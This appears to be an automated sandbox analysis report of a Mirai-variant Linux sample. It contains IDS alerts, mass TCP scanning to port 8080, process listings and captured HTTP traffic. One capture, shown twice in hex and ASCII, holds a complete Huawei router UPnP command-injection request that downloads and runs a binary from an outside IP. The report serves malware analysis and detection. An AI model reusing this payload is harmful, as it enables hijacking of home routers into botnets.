192.168.2.2388.216.185.9945494802839471 05/27/22-12:31:24.036858	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45494	80	192.168.2.23	88.216.185.99
192.168.2.2395.101.227.3638306802839471 05/27/22-12:34:15.292281	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38306	80	192.168.2.23	95.101.227.36
192.168.2.2388.202.224.4533472802839471 05/27/22-12:34:17.743999	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33472	80	192.168.2.23	88.202.224.45
192.168.2.2395.179.232.7353852802839471 05/27/22-12:31:56.918991	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53852	80	192.168.2.23	95.179.232.73
192.168.2.2395.130.126.2559386802839471 05/27/22-12:31:15.003635	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59386	80	192.168.2.23	95.130.126.25
192.168.2.23112.124.20.13054500802839471 05/27/22-12:31:23.574128	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54500	80	192.168.2.23	112.124.20.130
192.168.2.2395.101.106.7939324802839471 05/27/22-12:31:34.935665	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39324	80	192.168.2.23	95.101.106.79
192.168.2.2395.100.48.23837708802839471 05/27/22-12:33:40.003945	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37708	80	192.168.2.23	95.100.48.238
192.168.2.2395.245.107.15543538802839471 05/27/22-12:31:56.958042	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43538	80	192.168.2.23	95.245.107.155
192.168.2.2395.100.149.2437798802839471 05/27/22-12:33:06.925655	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37798	80	192.168.2.23	95.100.149.24
192.168.2.2388.148.79.18059856802839471 05/27/22-12:32:49.499358	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59856	80	192.168.2.23	88.148.79.180
192.168.2.23112.187.174.20457618802839471 05/27/22-12:31:23.569091	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57618	80	192.168.2.23	112.187.174.204
192.168.2.2388.249.121.15335810802839471 05/27/22-12:33:32.552249	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35810	80	192.168.2.23	88.249.121.153
192.168.2.2395.18.254.5759420802839471 05/27/22-12:33:03.227728	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59420	80	192.168.2.23	95.18.254.57
192.168.2.23112.84.184.12345694802839471 05/27/22-12:33:25.000957	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45694	80	192.168.2.23	112.84.184.123
192.168.2.2388.201.52.5153612802839471 05/27/22-12:31:21.447416	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53612	80	192.168.2.23	88.201.52.51
192.168.2.23112.84.220.9939174802839471 05/27/22-12:32:02.417435	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39174	80	192.168.2.23	112.84.220.99
192.168.2.23112.197.186.6934310802839471 05/27/22-12:34:17.929289	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34310	80	192.168.2.23	112.197.186.69
192.168.2.2395.110.156.5059712802839471 05/27/22-12:31:56.929753	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59712	80	192.168.2.23	95.110.156.50
192.168.2.2395.65.15.14756142802839471 05/27/22-12:32:36.806859	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56142	80	192.168.2.23	95.65.15.147
192.168.2.2395.56.77.3144018802839471 05/27/22-12:31:01.178429	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44018	80	192.168.2.23	95.56.77.31
192.168.2.2388.99.173.1142122802839471 05/27/22-12:34:00.363964	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42122	80	192.168.2.23	88.99.173.11
192.168.2.23112.184.22.9750054802839471 05/27/22-12:34:15.300043	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50054	80	192.168.2.23	112.184.22.97
192.168.2.23112.17.60.21942544802839471 05/27/22-12:31:26.982240	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42544	80	192.168.2.23	112.17.60.219
192.168.2.2395.100.10.2841958802839471 05/27/22-12:34:29.402917	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41958	80	192.168.2.23	95.100.10.28
192.168.2.2388.198.136.6953612802839471 05/27/22-12:31:29.021624	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53612	80	192.168.2.23	88.198.136.69
192.168.2.23112.124.202.5949138802839471 05/27/22-12:32:33.941935	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49138	80	192.168.2.23	112.124.202.59
192.168.2.23112.177.75.2539808802839471 05/27/22-12:32:52.499221	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39808	80	192.168.2.23	112.177.75.25
192.168.2.2388.214.189.21950920802839471 05/27/22-12:31:09.651368	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50920	80	192.168.2.23	88.214.189.219
192.168.2.2395.38.125.7843592802839471 05/27/22-12:34:00.555290	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43592	80	192.168.2.23	95.38.125.78
192.168.2.2395.101.230.24241354802839471 05/27/22-12:32:56.792589	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41354	80	192.168.2.23	95.101.230.242
192.168.2.2395.81.113.14750458802839471 05/27/22-12:34:04.042063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50458	80	192.168.2.23	95.81.113.147
192.168.2.23112.165.232.15442434802839471 05/27/22-12:31:00.635005	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42434	80	192.168.2.23	112.165.232.154
192.168.2.2395.80.109.20545616802839471 05/27/22-12:33:44.171390	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45616	80	192.168.2.23	95.80.109.205
192.168.2.2395.110.131.9152760802839471 05/27/22-12:33:06.964903	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52760	80	192.168.2.23	95.110.131.91
192.168.2.2395.217.209.12134086802839471 05/27/22-12:31:19.799060	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34086	80	192.168.2.23	95.217.209.121
192.168.2.2395.101.225.13057228802839471 05/27/22-12:31:19.784946	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57228	80	192.168.2.23	95.101.225.130
192.168.2.2395.93.106.22447370802839471 05/27/22-12:32:21.246012	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47370	80	192.168.2.23	95.93.106.224

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2022 12:30:54.055886030 CEST	42836	443	192.168.2.23	91.189.91.43
May 27, 2022 12:30:54.823952913 CEST	42516	80	192.168.2.23	109.202.202.202
May 27, 2022 12:30:56.273214102 CEST	18319	8080	192.168.2.23	94.31.105.112
May 27, 2022 12:30:56.273216963 CEST	18319	8080	192.168.2.23	95.21.34.188
May 27, 2022 12:30:56.273219109 CEST	18319	8080	192.168.2.23	62.182.198.188
May 27, 2022 12:30:56.273227930 CEST	18319	8080	192.168.2.23	62.38.59.93
May 27, 2022 12:30:56.273247004 CEST	18319	8080	192.168.2.23	31.82.196.224
May 27, 2022 12:30:56.273256063 CEST	18319	8080	192.168.2.23	95.174.116.225
May 27, 2022 12:30:56.273258924 CEST	18319	8080	192.168.2.23	31.173.116.72
May 27, 2022 12:30:56.273264885 CEST	18319	8080	192.168.2.23	94.95.95.229
May 27, 2022 12:30:56.273281097 CEST	18319	8080	192.168.2.23	95.238.5.169
May 27, 2022 12:30:56.273284912 CEST	18319	8080	192.168.2.23	62.17.148.51
May 27, 2022 12:30:56.273293018 CEST	18319	8080	192.168.2.23	62.66.72.188
May 27, 2022 12:30:56.273325920 CEST	18319	8080	192.168.2.23	31.104.229.25
May 27, 2022 12:30:56.273340940 CEST	18319	8080	192.168.2.23	31.71.223.208
May 27, 2022 12:30:56.273340940 CEST	18319	8080	192.168.2.23	94.2.244.188
May 27, 2022 12:30:56.273348093 CEST	18319	8080	192.168.2.23	95.200.122.26
May 27, 2022 12:30:56.273349047 CEST	18319	8080	192.168.2.23	94.85.29.138
May 27, 2022 12:30:56.273349047 CEST	18319	8080	192.168.2.23	94.224.86.23
May 27, 2022 12:30:56.273351908 CEST	18319	8080	192.168.2.23	85.211.213.164
May 27, 2022 12:30:56.273356915 CEST	18319	8080	192.168.2.23	31.234.40.82
May 27, 2022 12:30:56.273353100 CEST	18319	8080	192.168.2.23	85.123.124.212
May 27, 2022 12:30:56.273359060 CEST	18319	8080	192.168.2.23	94.173.7.105
May 27, 2022 12:30:56.273359060 CEST	18319	8080	192.168.2.23	95.206.173.85
May 27, 2022 12:30:56.273367882 CEST	18319	8080	192.168.2.23	62.39.31.92
May 27, 2022 12:30:56.273384094 CEST	18319	8080	192.168.2.23	31.204.8.101
May 27, 2022 12:30:56.273389101 CEST	18319	8080	192.168.2.23	85.30.32.68
May 27, 2022 12:30:56.273395061 CEST	18319	8080	192.168.2.23	94.99.114.216
May 27, 2022 12:30:56.273399115 CEST	18319	8080	192.168.2.23	31.118.166.157
May 27, 2022 12:30:56.273416042 CEST	18319	8080	192.168.2.23	85.155.126.89
May 27, 2022 12:30:56.273416042 CEST	18319	8080	192.168.2.23	31.38.157.235
May 27, 2022 12:30:56.273426056 CEST	18319	8080	192.168.2.23	62.93.152.162
May 27, 2022 12:30:56.273433924 CEST	18319	8080	192.168.2.23	95.19.78.244
May 27, 2022 12:30:56.273435116 CEST	18319	8080	192.168.2.23	31.106.170.112
May 27, 2022 12:30:56.273449898 CEST	18319	8080	192.168.2.23	95.113.182.89
May 27, 2022 12:30:56.273451090 CEST	18319	8080	192.168.2.23	94.203.184.134
May 27, 2022 12:30:56.273452044 CEST	18319	8080	192.168.2.23	31.116.54.52
May 27, 2022 12:30:56.273458958 CEST	18319	8080	192.168.2.23	95.100.83.32
May 27, 2022 12:30:56.273462057 CEST	18319	8080	192.168.2.23	62.191.160.7
May 27, 2022 12:30:56.273462057 CEST	18319	8080	192.168.2.23	62.164.34.61
May 27, 2022 12:30:56.273462057 CEST	18319	8080	192.168.2.23	85.10.119.67
May 27, 2022 12:30:56.273463011 CEST	18319	8080	192.168.2.23	62.217.171.160
May 27, 2022 12:30:56.273463011 CEST	18319	8080	192.168.2.23	85.201.5.25
May 27, 2022 12:30:56.273468018 CEST	18319	8080	192.168.2.23	85.50.185.238
May 27, 2022 12:30:56.273471117 CEST	18319	8080	192.168.2.23	94.140.96.24
May 27, 2022 12:30:56.273473024 CEST	18319	8080	192.168.2.23	31.30.206.154
May 27, 2022 12:30:56.273473978 CEST	18319	8080	192.168.2.23	94.246.226.195
May 27, 2022 12:30:56.273473978 CEST	18319	8080	192.168.2.23	94.225.124.144
May 27, 2022 12:30:56.273474932 CEST	18319	8080	192.168.2.23	85.95.214.19
May 27, 2022 12:30:56.273478031 CEST	18319	8080	192.168.2.23	31.243.222.35
May 27, 2022 12:30:56.273478985 CEST	18319	8080	192.168.2.23	85.154.102.254
May 27, 2022 12:30:56.273482084 CEST	18319	8080	192.168.2.23	31.103.231.32
May 27, 2022 12:30:56.273483992 CEST	18319	8080	192.168.2.23	62.238.58.43
May 27, 2022 12:30:56.273485899 CEST	18319	8080	192.168.2.23	94.177.51.184
May 27, 2022 12:30:56.273489952 CEST	18319	8080	192.168.2.23	31.10.13.186
May 27, 2022 12:30:56.273494959 CEST	18319	8080	192.168.2.23	95.195.187.83
May 27, 2022 12:30:56.273495913 CEST	18319	8080	192.168.2.23	85.198.14.169
May 27, 2022 12:30:56.273497105 CEST	18319	8080	192.168.2.23	94.227.20.33
May 27, 2022 12:30:56.273498058 CEST	18319	8080	192.168.2.23	62.128.111.160
May 27, 2022 12:30:56.273500919 CEST	18319	8080	192.168.2.23	95.76.161.218
May 27, 2022 12:30:56.273500919 CEST	18319	8080	192.168.2.23	31.33.7.191
May 27, 2022 12:30:56.273503065 CEST	18319	8080	192.168.2.23	95.93.245.86
May 27, 2022 12:30:56.273504972 CEST	18319	8080	192.168.2.23	62.165.65.201
May 27, 2022 12:30:56.273504972 CEST	18319	8080	192.168.2.23	31.212.26.90
May 27, 2022 12:30:56.273505926 CEST	18319	8080	192.168.2.23	95.57.35.96
May 27, 2022 12:30:56.273508072 CEST	18319	8080	192.168.2.23	62.190.217.61
May 27, 2022 12:30:56.273508072 CEST	18319	8080	192.168.2.23	85.21.81.101
May 27, 2022 12:30:56.273509979 CEST	18319	8080	192.168.2.23	94.25.118.61
May 27, 2022 12:30:56.273511887 CEST	18319	8080	192.168.2.23	31.76.141.11
May 27, 2022 12:30:56.273515940 CEST	18319	8080	192.168.2.23	85.145.94.2
May 27, 2022 12:30:56.273519993 CEST	18319	8080	192.168.2.23	62.59.204.219
May 27, 2022 12:30:56.273525953 CEST	18319	8080	192.168.2.23	85.245.229.51
May 27, 2022 12:30:56.273530006 CEST	18319	8080	192.168.2.23	62.131.176.74
May 27, 2022 12:30:56.273533106 CEST	18319	8080	192.168.2.23	62.230.41.108
May 27, 2022 12:30:56.273539066 CEST	18319	8080	192.168.2.23	94.130.24.174
May 27, 2022 12:30:56.273540974 CEST	18319	8080	192.168.2.23	85.137.179.145
May 27, 2022 12:30:56.273541927 CEST	18319	8080	192.168.2.23	62.160.142.95
May 27, 2022 12:30:56.273544073 CEST	18319	8080	192.168.2.23	62.121.84.168
May 27, 2022 12:30:56.273547888 CEST	18319	8080	192.168.2.23	94.221.88.20
May 27, 2022 12:30:56.273551941 CEST	18319	8080	192.168.2.23	85.193.16.93
May 27, 2022 12:30:56.273555994 CEST	18319	8080	192.168.2.23	31.202.201.254
May 27, 2022 12:30:56.273560047 CEST	18319	8080	192.168.2.23	31.30.245.149
May 27, 2022 12:30:56.273561001 CEST	18319	8080	192.168.2.23	95.105.61.89
May 27, 2022 12:30:56.273564100 CEST	18319	8080	192.168.2.23	85.70.91.233
May 27, 2022 12:30:56.273567915 CEST	18319	8080	192.168.2.23	31.227.215.249
May 27, 2022 12:30:56.273572922 CEST	18319	8080	192.168.2.23	85.72.34.244
May 27, 2022 12:30:56.273578882 CEST	18319	8080	192.168.2.23	85.41.77.125
May 27, 2022 12:30:56.273581982 CEST	18319	8080	192.168.2.23	31.125.235.108
May 27, 2022 12:30:56.273588896 CEST	18319	8080	192.168.2.23	62.199.253.213
May 27, 2022 12:30:56.273593903 CEST	18319	8080	192.168.2.23	31.158.15.82
May 27, 2022 12:30:56.273597002 CEST	18319	8080	192.168.2.23	85.214.71.131
May 27, 2022 12:30:56.273601055 CEST	18319	8080	192.168.2.23	94.35.220.31
May 27, 2022 12:30:56.273602962 CEST	18319	8080	192.168.2.23	95.248.173.123
May 27, 2022 12:30:56.273608923 CEST	18319	8080	192.168.2.23	85.131.29.186
May 27, 2022 12:30:56.273612976 CEST	18319	8080	192.168.2.23	94.27.71.86
May 27, 2022 12:30:56.273614883 CEST	18319	8080	192.168.2.23	85.51.167.199
May 27, 2022 12:30:56.273614883 CEST	18319	8080	192.168.2.23	94.180.225.175
May 27, 2022 12:30:56.273619890 CEST	18319	8080	192.168.2.23	62.14.228.108
May 27, 2022 12:30:56.273623943 CEST	18319	8080	192.168.2.23	95.133.73.3
May 27, 2022 12:30:56.273626089 CEST	18319	8080	192.168.2.23	94.221.173.212

HTTP Request Dependency Graph

192.168.0.14:80

102.129.143.42:45766

System Behavior

Analysis Process: qFhgp7xLT7 PID: 6237, Parent PID: 6125

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	/tmp/qFhgp7xLT7
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6238, Parent PID: 6237

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6239, Parent PID: 6237

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6240, Parent PID: 6237

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6241, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6242, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6244, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6245, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6246, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Analysis Process: qFhgp7xLT7 PID: 6247, Parent PID: 6240

General

Start time:	12:30:55
Start date:	27/05/2022
Path:	/tmp/qFhgp7xLT7
Arguments:	n/a
File size:	62224 bytes
MD5 hash:	60c16bbdea70d058618c85e3e7d5a7c5

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 35 35 2e 31 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.95.55.16 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 35 35 2e 31 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.95.55.16 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 May 2022 10:32:32 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15X-Powered-By: PHP/5.6.15Set-Cookie: whytouch_token=false; expires=Fri, 27-May-2022 10:15:52 GMT; Max-Age=-1000Content-Encoding: gzipVary: Accept-EncodingContent-Length: 5623Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 0b c5 3b 69 73 db 46 96 9f 95 aa fc 87 36 ec 58 e4 5a 00 2f 51 94 48 91 39 6c 27 a3 2a 3b 56 62 25 9b 8c a3 75 81 44 93 84 05 02 30 00 8a 52 64 55 c9 ce 3a b1 e3 2b d9 71 0e 7b 9d c3 59 3b f1 24 e3 63 26 bb e3 4b 76 fe cb 46 a4 a4 4f f9 0b fb fa 00 d0 20 29 8e 32 49 d5 2a 91 05 36 de 7b fd ae 7e 47 77 73 72 c7 be 43 7b 67 de 9e de 8f ea 5e c3 28 3d fb cc 24 f9 8b 0c d5 ac 15 25 6c 4a 30 82 d0 64 1d ab 1a 7d 82 e7 06 f6 54 54 a9 ab 8e 8b bd a2 d4 f4 aa f2 b8 c4 df a1 49 4f f7 0c 5c 9a b1 9a 95 ba 5b b7 5a a8 fd f4 4e 67 f5 f2 fa 8d 47 48 96 d1 f4 f4 4c 62 7a df cb 68 e3 c9 e3 ce 17 4f db 97 3e ee 9c 3d d7 b9 f6 68 32 c1 b0 22 f4 2d d3 c3 26 d0 9f da 5f c4 5a 0d 8f 54 ea 8e d5 c0 c5 94 04 7c 7a b6 8c 8f 37 f5 f9 a2 f4 96 fc c6 8b f2 5e ab 61 ab 9e 5e 36 b0 14 a1 61 aa 80 20 cd eb b8 65 5b 8e 27 85 34 5b ba e6 d5 8b 1a 9e d7 2b 58 a6 1f 46 90 6e ea 9e ae 1a b2 5b 51 0d 98 46 49 f6 a3 35 87 17 5b 96 a3 b9 02 2d 5b ab 22 cf a2 ca cb 8e 20 db f6 10 91 eb da b9 f6 a5 73 ed 6b 67 60 04 de 77 8d 10 98 33 ef af 3d fa 01 94 b3 f6 d3 75 0e 13 19 a1 40 9c ec 88 f8 21 cb a0 c3 57 56 0b 3b b6 a5 9b de a0 31 c0 72 0d 5d c3 88 d8 64 04 59 a6 a1 9b 98 92 05 39 e6 b1 e3 61 27 1c 0d b1 85 97 fd 47 ab 0e c6 3e de 16 c3 fd 11 43 6e 38 1c 13 52 7c 06 d6 ab 6a 05 97 2d 6b 2e 18 f0 5a ba c7 d8 61 9f 5b b8 dc cf 4c 6a d3 ab 5b 8e 60 24 02 34 24 42 64 c6 92 b2 ab 7b 58 06 86 f4 aa 5e 01 f7 b1 4c 01 21 59 ce a9 5a 7a 2c 95 9a c8 a9 b9 4c b6 3a 3a 5e 4d 6b 5a 2e 99 4b 67 b3 38 9b ce 48 28 11 92 b4 1d cb 06 b9 16 8b d2 f1 4a 5e d5 1a ba 29 3a 48 6a 34 9b cb 8c 65 b3 a3 63 b9 64 6a 34 97 cd 24 c7 32 b9 6c 8e 51 a0 9c 83 cc 73 c8 c1 46 51 72 bd 45 03 bb 75 8c c1 5b bd 45 1b 18 f5 f0 82 97 a8 b8 40 b0 ee e0 6a 51 32 f4 72 02 54 e2 b9 9e a3 da e4 45 f8 49 21 60 bf 33 4d d9 c1 ae 6d 99 ae 3e 8f ff 69 f2 21 84 9b f0 ea b8 b1 1d 4a 21 63 55 d0 a3 ac b6 b0 0b ab 9f f2 26 0e f8 94 86 06 92 11 19 28 ab a6 89 9d 08 07 6e c5 d1 c1 9d 5c a7 c2 66 3c 76 bc 89 9d 45 39 a5 8c 2b 29 05 8c a9 1c 73 23 a2 1d 53 e7 55 86 23 95 26 13 ec 89 f2 d0 9f 90 d2 b0 9a 2e 6e c1 f4 c6 36 29 51 ae 76 40 bc dc 87 1b 16 b2 d5 1a 59 5c b0 5c 64 b9 8b e5 2d 48 a1 67 9f 39 f6 1a 99 3a 56 6d 9a 15 e2 d9 b1 5d 71 b4 44 30 19 fe ae 98 a4 b8 15 cb 31 8c 86 35 8f a5 b8 52 31 f4 ca 5c 08 0d c0 3c 9e 33 60 16 56 ca 96 b6 08 b0 aa a9 37 54 0f c7 04 10 f2 03 93 5b 86 31 63 d9 79 c0 d8 15 f3 ea ba 0b b0 9e e7 00 3a 58 41 8a c7 15 ab 5a 85 94 11 8b 2b 9e 65 a3 3d 48 b2 17 a4 90 27 f2 b3 3c 82 b2 c9 64 bc 10 1d 75 b0 d7 74 4c 08 06 86 8b 85 57 cb f1 02 28 dd e7 8e 33 57 d6 4d 2d 26 85 1a 97 46 02 a1 f0 3c
